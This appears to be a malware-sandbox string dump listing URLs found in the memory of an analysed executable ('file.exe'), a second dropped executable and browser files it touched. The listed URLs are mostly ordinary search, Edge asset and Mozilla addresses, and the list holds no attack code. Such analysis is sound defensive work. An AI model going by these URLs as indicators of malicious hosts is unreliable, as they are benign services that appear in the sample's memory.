Source: file.exe, file.exe, 00000000.00000002.2037877310.000000006CABD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.2030889962.000000001D524000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2037677893.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: file.exe, 00000000.00000003.1690636690.0000000000FD9000.00000004.00000020.00020000.00000000.sdmp, eDPQZkT.exe, 0000001E.00000003.2747325482.0000000005548000.00000004.00000800.00020000.00000000.sdmp, eDPQZkT.exe, 0000001E.00000003.2747087536.000000000554B000.00000004.00000800.00020000.00000000.sdmp, eDPQZkT.exe, 0000001E.00000003.2747178565.0000000005548000.00000004.00000800.00020000.00000000.sdmp, HJJJDAEG.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chromecache_476.5.dr String found in binary or memory: https://apis.google.com
Source: 2cc80dabc69f58b6_1.9.dr String found in binary or memory: https://assets.msn.cn/resolver/
Source: 6a854b32-01e2-4583-8db8-2999f2ad48ba.tmp.10.dr String found in binary or memory: https://assets.msn.com
Source: 2cc80dabc69f58b6_1.9.dr String found in binary or memory: https://assets.msn.com/resolver/
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://bard.google.com/
Source: 2cc80dabc69f58b6_1.9.dr String found in binary or memory: https://bit.ly/wb-precache
Source: file.exe, 00000000.00000002.2034114204.0000000023672000.00000004.00000020.00020000.00000000.sdmp, KJKJKFCBKKJDGDHIDBGI.0.dr String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
Source: file.exe, 00000000.00000002.2034114204.0000000023672000.00000004.00000020.00020000.00000000.sdmp, KJKJKFCBKKJDGDHIDBGI.0.dr String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
Source: 2cc80dabc69f58b6_1.9.dr String found in binary or memory: https://browser.events.data.msn.cn/
Source: 2cc80dabc69f58b6_1.9.dr String found in binary or memory: https://browser.events.data.msn.com/
Source: Reporting and NEL.10.dr String found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusiness
Source: 2cc80dabc69f58b6_1.9.dr String found in binary or memory: https://c.msn.com/
Source: file.exe, 00000000.00000003.1690636690.0000000000FD9000.00000004.00000020.00020000.00000000.sdmp, eDPQZkT.exe, 0000001E.00000003.2747325482.0000000005548000.00000004.00000800.00020000.00000000.sdmp, eDPQZkT.exe, 0000001E.00000003.2747087536.000000000554B000.00000004.00000800.00020000.00000000.sdmp, eDPQZkT.exe, 0000001E.00000003.2747178565.0000000005548000.00000004.00000800.00020000.00000000.sdmp, HJJJDAEG.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.1779754768.000000002361C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690636690.0000000000FD9000.00000004.00000020.00020000.00000000.sdmp, eDPQZkT.exe, 0000001E.00000003.2747325482.0000000005548000.00000004.00000800.00020000.00000000.sdmp, eDPQZkT.exe, 0000001E.00000003.2747087536.000000000554B000.00000004.00000800.00020000.00000000.sdmp, eDPQZkT.exe, 0000001E.00000003.2747178565.0000000005548000.00000004.00000800.00020000.00000000.sdmp, BGDHDAFI.0.dr, Web Data.9.dr, HJJJDAEG.0.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.1779754768.000000002361C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690636690.0000000000FD9000.00000004.00000020.00020000.00000000.sdmp, eDPQZkT.exe, 0000001E.00000003.2747325482.0000000005548000.00000004.00000800.00020000.00000000.sdmp, eDPQZkT.exe, 0000001E.00000003.2747087536.000000000554B000.00000004.00000800.00020000.00000000.sdmp, eDPQZkT.exe, 0000001E.00000003.2747178565.0000000005548000.00000004.00000800.00020000.00000000.sdmp, BGDHDAFI.0.dr, Web Data.9.dr, HJJJDAEG.0.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: manifest.json.9.dr String found in binary or memory: https://chrome.google.com/webstore/
Source: manifest.json.9.dr String found in binary or memory: https://chromewebstore.google.com/
Source: 6aeb00b7-1fab-414e-ab66-458ed8f652df.tmp.10.dr, 6a854b32-01e2-4583-8db8-2999f2ad48ba.tmp.10.dr String found in binary or memory: https://clients2.google.com
Source: manifest.json0.9.dr String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: 6aeb00b7-1fab-414e-ab66-458ed8f652df.tmp.10.dr, 6a854b32-01e2-4583-8db8-2999f2ad48ba.tmp.10.dr String found in binary or memory: https://clients2.googleusercontent.com
Source: file.exe, 00000000.00000002.2034114204.0000000023672000.00000004.00000020.00020000.00000000.sdmp, KJKJKFCBKKJDGDHIDBGI.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: file.exe, 00000000.00000002.2034114204.0000000023672000.00000004.00000020.00020000.00000000.sdmp, KJKJKFCBKKJDGDHIDBGI.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: Reporting and NEL.10.dr String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: manifest.json0.9.dr String found in binary or memory: https://docs.google.com/
Source: manifest.json0.9.dr String found in binary or memory: https://drive-autopush.corp.google.com/
Source: manifest.json0.9.dr String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: manifest.json0.9.dr String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: manifest.json0.9.dr String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: manifest.json0.9.dr String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: manifest.json0.9.dr String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: manifest.json0.9.dr String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: manifest.json0.9.dr String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: manifest.json0.9.dr String found in binary or memory: https://drive-preprod.corp.google.com/
Source: manifest.json0.9.dr String found in binary or memory: https://drive-staging.corp.google.com/
Source: manifest.json0.9.dr String found in binary or memory: https://drive.google.com/
Source: file.exe, 00000000.00000003.1779754768.000000002361C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690636690.0000000000FD9000.00000004.00000020.00020000.00000000.sdmp, eDPQZkT.exe, 0000001E.00000003.2747325482.0000000005548000.00000004.00000800.00020000.00000000.sdmp, eDPQZkT.exe, 0000001E.00000003.2747087536.000000000554B000.00000004.00000800.00020000.00000000.sdmp, eDPQZkT.exe, 0000001E.00000003.2747178565.0000000005548000.00000004.00000800.00020000.00000000.sdmp, BGDHDAFI.0.dr, Web Data.9.dr, HJJJDAEG.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.1779754768.000000002361C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690636690.0000000000FD9000.00000004.00000020.00020000.00000000.sdmp, eDPQZkT.exe, 0000001E.00000003.2747325482.0000000005548000.00000004.00000800.00020000.00000000.sdmp, eDPQZkT.exe, 0000001E.00000003.2747087536.000000000554B000.00000004.00000800.00020000.00000000.sdmp, eDPQZkT.exe, 0000001E.00000003.2747178565.0000000005548000.00000004.00000800.00020000.00000000.sdmp, BGDHDAFI.0.dr, Web Data.9.dr, HJJJDAEG.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.1779754768.000000002361C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690636690.0000000000FD9000.00000004.00000020.00020000.00000000.sdmp, eDPQZkT.exe, 0000001E.00000003.2747325482.0000000005548000.00000004.00000800.00020000.00000000.sdmp, eDPQZkT.exe, 0000001E.00000003.2747087536.000000000554B000.00000004.00000800.00020000.00000000.sdmp, eDPQZkT.exe, 0000001E.00000003.2747178565.0000000005548000.00000004.00000800.00020000.00000000.sdmp, BGDHDAFI.0.dr, Web Data.9.dr, HJJJDAEG.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 6aeb00b7-1fab-414e-ab66-458ed8f652df.tmp.10.dr, 6a854b32-01e2-4583-8db8-2999f2ad48ba.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net
Source: 000003.log5.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit
Source: 000003.log5.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr
Source: 000003.log8.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtrac
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_163_music.png/1.0.3/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_dark.png/1.7.32/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_hc.png/1.7.32/asset
Source: HubApps Icons.9.dr, 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass
Source: HubApps Icons.9.dr, 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_amazon_music_light.png/1.4.13/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_apple_music.png/1.4.12/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_bard_light.png/1.0.1/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.6.8/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.6.8/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.6.8/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_hc.png/1.0.3/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_dark.png/1.0.3/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_light.png/1.0.3/asse
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_deezer.png/1.4.12/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_dark.png/1.0.6/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_light.png/1.0.6/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_color.png/1.0.14/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_hc.png/1.0.14/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_hc.png/1.1.12/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_dark.png/1.1.12/asset
Source: HubApps Icons.9.dr, 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_hc.png/1.2.0/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_dark.png/1.2.0/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_light.png/1.2.0/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_excel.png/1.7.32/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_facebook_messenger.png/1.5.14/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gaana.png/1.0.3/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc.png/1.7.1/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_controller.png/1.7.1/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_joystick.png/1.7.1/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark.png/1.7.1/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_controller.png/1.7.1/
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_joystick.png/1.7.1/as
Source: HubApps Icons.9.dr, 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_controller.png/1.7.1
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_joystick.png/1.7.1/a
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gmail.png/1.5.4/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_help.png/1.0.0/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_hc.png/0.1.3/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_dark.png/0.1.3/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_light.png/0.1.3/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_iHeart.png/1.0.3/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_hc.png/1.0.14/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_dark.png/1.0.14/as
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_light.png/1.0.14/a
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_instagram.png/1.4.13/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_ku_gou.png/1.0.3/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_last.png/1.0.3/asset
Source: 000003.log5.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Sho
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_dark.png/1.1.0/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_hc.png/1.1.0/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_light.png/1.1.0/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_naver_vibe.png/1.0.3/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_dark.png/1.4.9/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_hc.png/1.4.9/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_light.png/1.4.9/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_dark.png/1.9.10/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_hc.png/1.9.10/asset
Source: HubApps Icons.9.dr, 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_hc.png/1.1.0/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_dark.png/1.1.0/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_light.png/1.1.0/asse
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_power_point.png/1.7.32/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_qq.png/1.0.3/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_dark.png/1.1.12/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_hc.png/1.1.12/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_light.png/1.1.12/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_hc.png/1.1.3/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_dark.png/1.1.3/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_light.png/1.1.3/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_hc.png/1.3.6/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_dark.png/1.3.6/asset
Source: HubApps Icons.9.dr, 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.1.12/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.4.0/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.5.13/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.1.12/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.4.0/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.5.13/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.1.12/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.4.0/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.5.13/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_hc.png/1.4.0/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_dark.png/1.4.0/asset
Source: HubApps Icons.9.dr, 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_dark.png/1.3.20/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_hc.png/1.3.20/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_light.png/1.3.20/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_sound_cloud.png/1.0.3/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_spotify.png/1.4.12/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_dark.png/1.2.19/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_hc.png/1.2.19/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_light.png/1.2.19/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_telegram.png/1.0.4/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_hc.png/1.0.5/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_dark.png/1.0.5/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_light.png/1.0.5/asset
Source: 75a6471a-367b-41bd-bd17-1e4ccc6b0ddd.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tidal.png/1.0.3/asset
